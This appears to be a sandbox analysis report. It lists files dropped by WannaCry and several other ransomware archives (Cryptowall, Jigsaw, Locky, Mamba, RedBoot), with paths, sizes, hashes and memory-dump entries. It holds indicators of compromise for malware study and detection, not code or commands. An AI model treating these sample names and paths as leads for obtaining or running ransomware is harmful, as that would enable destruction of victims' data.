2d9932aa2766fd49d4276b7ecc560e9e

SHA1
34b940785dbe6c28416d737cd07b13632aea8cde

SHA256
8e7bcea689d80e129996e05d11edc20e58b1bb9441e396ad2ff22810c5deb04e

SHA512
36a831cfe598bc3e7482112ad420c0afa732004ed42b75ce09fabcc6c858641bbf18e63f1dc68c9139d16adebdde86a3ef7a7704a3dfcfee18ea778f648850da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
7aab1dfe3aec166dd4e31ac213a2f5bd

SHA1
9c601af7f21b73a1d8b81e98bc0ae49042927448

SHA256
991bd07de761b117f98a981585124cd89bff99a32e2440699d95251630290661

SHA512
f95aad00999b208abaa96c472be09708de2043b7a0bb706d315549f2766d6296dcdb1996daf3d6bb57e769079a7a9cec0540a1172b126c688bb7c9b5258424a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
f515ea1dea2d7ba9b567f6d9ed1a860e

SHA1
cd3772f9a7de6b695b5b455dd2f23cd9132b8831

SHA256
03a6b94a96bfe2ca4b3286e8d0d1fbd1bdf3036548faf72bb0629952e2dce7a6

SHA512
dbdbbde764dc46ddfef3ed9f8ea898b53c655d3379cb28a8d5ccfdb29cfd90a78698b4f5ed1307e7b8ad5fa23ec7ae4e1da60fa9220b394c698a1e8c67c7fa09

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]

Filesize
933B

MD5
7a2726bb6e6a79fb1d092b7f2b688af0

SHA1
b3effadce8b76aee8cd6ce2eccbb8701797468a2

SHA256
840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5

SHA512
4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\tor.exe

Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\b.wnry

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\c.wnry

Filesize
780B

MD5
8124a611153cd3aceb85a7ac58eaa25d

SHA1
c1d5cd8774261d810dca9b6a8e478d01cd4995d6

SHA256
0ceb451c1dbefaa8231eeb462e8ce639863eb5b8ae4fa63a353eb6e86173119e

SHA512
b9c8dfb5d58c95628528cc729d2394367c5e205328645ca6ef78a3552d9ad9f824ae20611a43a6e01daaffeffdc9094f80d772620c731e4192eb0835b8ed0f17

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_bulgarian.wnry

Filesize
46KB

MD5
95673b0f968c0f55b32204361940d184

SHA1
81e427d15a1a826b93e91c3d2fa65221c8ca9cff

SHA256
40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

SHA512
7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_chinese (simplified).wnry

Filesize
53KB

MD5
0252d45ca21c8e43c9742285c48e91ad

SHA1
5c14551d2736eef3a1c1970cc492206e531703c1

SHA256
845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

SHA512
1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_chinese (traditional).wnry

Filesize
77KB

MD5
2efc3690d67cd073a9406a25005f7cea

SHA1
52c07f98870eabace6ec370b7eb562751e8067e9

SHA256
5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

SHA512
0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_croatian.wnry

Filesize
38KB

MD5
17194003fa70ce477326ce2f6deeb270

SHA1
e325988f68d327743926ea317abb9882f347fa73

SHA256
3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

SHA512
dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_czech.wnry

Filesize
39KB

MD5
537efeecdfa94cc421e58fd82a58ba9e

SHA1
3609456e16bc16ba447979f3aa69221290ec17d0

SHA256
5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

SHA512
e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_danish.wnry

Filesize
36KB

MD5
2c5a3b81d5c4715b7bea01033367fcb5

SHA1
b548b45da8463e17199daafd34c23591f94e82cd

SHA256
a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

SHA512
490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_dutch.wnry

Filesize
36KB

MD5
7a8d499407c6a647c03c4471a67eaad7

SHA1
d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

SHA256
2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

SHA512
608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_english.wnry

Filesize
36KB

MD5
fe68c2dc0d2419b38f44d83f2fcf232e

SHA1
6c6e49949957215aa2f3dfb72207d249adf36283

SHA256
26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

SHA512
941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_filipino.wnry

Filesize
36KB

MD5
08b9e69b57e4c9b966664f8e1c27ab09

SHA1
2da1025bbbfb3cd308070765fc0893a48e5a85fa

SHA256
d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

SHA512
966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_french.wnry

Filesize
37KB

MD5
4e57113a6bf6b88fdd32782a4a381274

SHA1
0fccbc91f0f94453d91670c6794f71348711061d

SHA256
9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

SHA512
4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_german.wnry

Filesize
36KB

MD5
3d59bbb5553fe03a89f817819540f469

SHA1
26781d4b06ff704800b463d0f1fca3afd923a9fe

SHA256
2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

SHA512
95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_greek.wnry

Filesize
47KB

MD5
fb4e8718fea95bb7479727fde80cb424

SHA1
1088c7653cba385fe994e9ae34a6595898f20aeb

SHA256
e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

SHA512
24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_indonesian.wnry

Filesize
36KB

MD5
3788f91c694dfc48e12417ce93356b0f

SHA1
eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

SHA256
23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

SHA512
b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_italian.wnry

Filesize
36KB

MD5
30a200f78498990095b36f574b6e8690

SHA1
c4b1b3c087bd12b063e98bca464cd05f3f7b7882

SHA256
49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

SHA512
c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_japanese.wnry

Filesize
79KB

MD5
b77e1221f7ecd0b5d696cb66cda1609e

SHA1
51eb7a254a33d05edf188ded653005dc82de8a46

SHA256
7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

SHA512
f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_korean.wnry

Filesize
89KB

MD5
6735cb43fe44832b061eeb3f5956b099

SHA1
d636daf64d524f81367ea92fdafa3726c909bee1

SHA256
552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

SHA512
60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_latvian.wnry

Filesize
40KB

MD5
c33afb4ecc04ee1bcc6975bea49abe40

SHA1
fbea4f170507cde02b839527ef50b7ec74b4821f

SHA256
a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

SHA512
0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_norwegian.wnry

Filesize
36KB

MD5
ff70cc7c00951084175d12128ce02399

SHA1
75ad3b1ad4fb14813882d88e952208c648f1fd18

SHA256
cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

SHA512
f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_polish.wnry

Filesize
38KB

MD5
e79d7f2833a9c2e2553c7fe04a1b63f4

SHA1
3d9f56d2381b8fe16042aa7c4feb1b33f2baebff

SHA256
519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e

SHA512
e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_portuguese.wnry

Filesize
37KB

MD5
fa948f7d8dfb21ceddd6794f2d56b44f

SHA1
ca915fbe020caa88dd776d89632d7866f660fc7a

SHA256
bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66

SHA512
0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_romanian.wnry

Filesize
50KB

MD5
313e0ececd24f4fa1504118a11bc7986

SHA1
e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d

SHA256
70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1

SHA512
c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_russian.wnry

Filesize
46KB

MD5
452615db2336d60af7e2057481e4cab5

SHA1
442e31f6556b3d7de6eb85fbac3d2957b7f5eac6

SHA256
02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078

SHA512
7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_slovak.wnry

Filesize
40KB

MD5
c911aba4ab1da6c28cf86338ab2ab6cc

SHA1
fee0fd58b8efe76077620d8abc7500dbfef7c5b0

SHA256
e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729

SHA512
3491ed285a091a123a1a6d61aafbb8d5621ccc9e045a237a2f9c2cf6049e7420eb96ef30fdcea856b50454436e2ec468770f8d585752d73fafd676c4ef5e800a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_spanish.wnry

Filesize
36KB

MD5
8d61648d34cba8ae9d1e2a219019add1

SHA1
2091e42fc17a0cc2f235650f7aad87abf8ba22c2

SHA256
72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1

SHA512
68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_swedish.wnry

Filesize
37KB

MD5
c7a19984eb9f37198652eaf2fd1ee25c

SHA1
06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae

SHA256
146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4

SHA512
43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_turkish.wnry

Filesize
41KB

MD5
531ba6b1a5460fc9446946f91cc8c94b

SHA1
cc56978681bd546fd82d87926b5d9905c92a5803

SHA256
6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415

SHA512
ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_vietnamese.wnry

Filesize
91KB

MD5
8419be28a0dcec3f55823620922b00fa

SHA1
2e4791f9cdfca8abf345d606f313d22b36c46b92

SHA256
1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8

SHA512
8fca77e54480aea3c0c7a705263ed8fb83c58974f5f0f62f12cc97c8e0506ba2cdb59b70e59e9a6c44dd7cde6adeeec35b494d31a6a146ff5ba7006136ab9386

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

Filesize
11.6MB

MD5
71d31e6ee3c9864266c962e144f1e777

SHA1
6aa625ba7ba89fe02bdab1cf21005bbe3789a2f2

SHA256
fc85deb02138adfcf0197793b61c88026cf74d52e1543fada1bd9aaa238f240b

SHA512
3c56f2779b3ed42360825cbc93a4fad262c2ca06ba5fdd8447768793d992782a0ec7ee356a6c17805b0c46faf61474cdb8590d364ed475bf12bfffcca73442c8

Download Submit
C:\Users\Admin\Downloads\Ransomware.Cryptowall.zip

Filesize
100KB

MD5
8710ea46c2db18965a3f13c5fb7c5be8

SHA1
24978c79b5b4b3796adceffe06a3a39b33dda41d

SHA256
60d574055ae164cc32df9e5c9402deefa9d07e5034328d7b41457d35b7312a0e

SHA512
c71de7a60e7edeedbdd7843a868b6f5a95f2718f0f35d274cf85951ee565ef3ba1e087881f12aeede686ce6d016f3fd533b7ef21d878a03d2455acc161abf583

Download Submit
C:\Users\Admin\Downloads\Ransomware.Cryptowall.zip:Zone.Identifier

Filesize
55B

MD5
0f98a5550abe0fb880568b1480c96a1c

SHA1
d2ce9f7057b201d31f79f3aee2225d89f36be07d

SHA256
2dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1

SHA512
dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6

Download Submit
C:\Users\Admin\Downloads\Ransomware.Jigsaw.zip

Filesize
239KB

MD5
3ad6374a3558149d09d74e6af72344e3

SHA1
e7be9f22578027fc0b6ddb94c09b245ee8ce1620

SHA256
86a391fe7a237f4f17846c53d71e45820411d1a9a6e0c16f22a11ebc491ff9ff

SHA512
21c21b36be200a195bfa648e228c64e52262b06d19d294446b8a544ff1d81f81eb2af74ddbdebc59915168db5dba76d0f0585e83471801d9ee37e59af0620720

Download Submit
C:\Users\Admin\Downloads\Ransomware.Locky.zip

Filesize
125KB

MD5
b265305541dce2a140da7802442fbac4

SHA1
63d0b780954a2bc96b3a77d9a2b3369d865bf1fd

SHA256
0537fa38b88755f39df1cd774b907ec759dacab2388dc0109f4db9f0e9d191a0

SHA512
af65384f814633fe1cde8bf4a3a1a8f083c7f5f0b7f105d47f3324cd2a8c9184ccf13cb3e43b47473d52f39f4151e7a9da1e9a16868da50abb74fcbc47724282

Download Submit
C:\Users\Admin\Downloads\Ransomware.Mamba.zip

Filesize
1.0MB

MD5
f94d1f4e2ce6c7cc81961361aab8a144

SHA1
88189db0691667653fe1522c6b5673bf75aa44aa

SHA256
610a52c340ebaff31093c5ef0d76032ac2acdc81a3431e68b244bf42905fd70a

SHA512
7b7cf9a782549e75f87b8c62d091369b47c1b22c9a10dcf4a5d9f2db9a879ed3969316292d3944f95aeb67f34ae6dc6bbe2ae5ca497be3a25741a2aa204e66ad

Download Submit
C:\Users\Admin\Downloads\Ransomware.Mamba.zip:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\Ransomware.RedBoot.zip

Filesize
1.2MB

MD5
51250dabf7df7832640e4a680676cb46

SHA1
74ba41bb17af6e5638171f7a6d9d49e978d8d3b3

SHA256
7fa2bf61405ac573a21334e34bf713dcb5d1fc0c72674e6cebc48d33a4a14d44

SHA512
43f898d7e5752312a79138dcce94c117a20fb6efd9e522fc1ed3cc2d407d13cacf5b6f810c7c1966c4c03217aeb51fce641feb31b26620ff239756132b17f57a

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry.zip.crdownload

Filesize
3.3MB

MD5
efe76bf09daba2c594d2bc173d9b5cf0

SHA1
ba5de52939cb809eae10fdbb7fac47095a9599a7

SHA256
707a9f323556179571bc832e34fa592066b1d5f2cac4a7426fe163597e3e618a

SHA512
4a1df71925cf2eb49c38f07c6a95bea17752b025f0114c6fd81bc0841c1d1f2965b5dda1469e454b9e8207c2e0dfd3df0959e57166620ccff86eeeb5cf855029

Download Submit
memory/2768-1096-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download
memory/3356-2552-0x0000000074130000-0x0000000074152000-memory.dmp

Filesize
136KB

Download
memory/3356-2549-0x0000000074270000-0x000000007428C000-memory.dmp

Filesize
112KB

Download
memory/3356-2573-0x0000000000950000-0x0000000000C4E000-memory.dmp

Filesize
3.0MB

Download
memory/3356-2584-0x0000000000950000-0x0000000000C4E000-memory.dmp

Filesize
3.0MB

Download
memory/3356-2590-0x0000000073F10000-0x000000007412C000-memory.dmp

Filesize
2.1MB

Download
memory/3356-2624-0x0000000000950000-0x0000000000C4E000-memory.dmp

Filesize
3.0MB

Download
memory/3356-2642-0x0000000000950000-0x0000000000C4E000-memory.dmp

Filesize
3.0MB

Download
memory/3356-2656-0x0000000073F10000-0x000000007412C000-memory.dmp

Filesize
2.1MB

Download
memory/3356-2666-0x0000000000950000-0x0000000000C4E000-memory.dmp

Filesize
3.0MB

Download
memory/3356-2553-0x0000000073F10000-0x000000007412C000-memory.dmp

Filesize
2.1MB

Download
memory/3356-2548-0x0000000074290000-0x0000000074312000-memory.dmp

Filesize
520KB

Download
memory/3356-2557-0x0000000000950000-0x0000000000C4E000-memory.dmp

Filesize
3.0MB

Download
memory/3356-2650-0x0000000000950000-0x0000000000C4E000-memory.dmp

Filesize
3.0MB

Download
memory/3356-2550-0x00000000741F0000-0x0000000074267000-memory.dmp

Filesize
476KB

Download
memory/3356-2551-0x0000000074160000-0x00000000741E2000-memory.dmp

Filesize
520KB

Download
memory/3356-2500-0x0000000073F10000-0x000000007412C000-memory.dmp

Filesize
2.1MB

Download
memory/3356-2547-0x0000000000950000-0x0000000000C4E000-memory.dmp

Filesize
3.0MB

Download
memory/3356-2501-0x0000000074160000-0x00000000741E2000-memory.dmp

Filesize
520KB

Download
memory/3356-2499-0x0000000074290000-0x0000000074312000-memory.dmp

Filesize
520KB

Download
memory/3356-2503-0x0000000000950000-0x0000000000C4E000-memory.dmp

Filesize
3.0MB

Download
memory/3356-2502-0x0000000074130000-0x0000000074152000-memory.dmp

Filesize
136KB

Download